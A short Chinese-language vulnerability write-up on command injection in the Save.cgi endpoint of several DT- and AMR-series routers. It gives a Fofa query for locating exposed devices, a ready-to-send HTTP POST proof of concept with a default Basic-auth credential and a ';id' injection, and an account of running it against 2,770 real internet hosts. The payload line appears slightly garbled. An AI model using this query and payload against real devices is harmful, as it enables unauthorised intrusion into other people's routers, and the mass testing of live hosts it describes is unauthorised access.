漏洞描述:
由於未經過過濾和適當限制的情況下,傳入的引數直接用於構建並執行系統命令,攻擊者透過將惡意命令注入到"Save.cgi"介面的請求引數中可以執行任意命令。
Fofa:
title="DT-100G-N" || title="DT-300N" || title="DT-100G" || title="AMR-3204G" || title="WMR-200N"
POC:
POST /cgi-bin/Save.cgi?cgi=PING HTTP/1.1
Host:
Authorization: Basic b3BlcmF0b3I6MTIzNA==
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 33
pid=2061&ip=127.0.0.1;id×=1
漏洞復現
在fofa中搜尋資產,共有2770條資料匹配
將匹配資料進行匯出整理,使用burp抓包構造資料包,對Host進行爆破
所有的ip均可以執行id命令,該漏洞的描述是可以執行任意命令,嘗試執行whoami,ls,set,echo…等命令,返回均為執行id命令的內容
嘗試對命令進行編碼或使用其他命令分隔符,也使用了完整路徑的方式,但依舊無法注入
所有嘗試修改的命令返回的都是執行'id'命令, 很可能後臺處理指令碼對輸入進行了嚴格的過濾或者特定的解析,只允許執行預定義的某些命令,或者在監測到師徒執行其他命令時預設執行'id'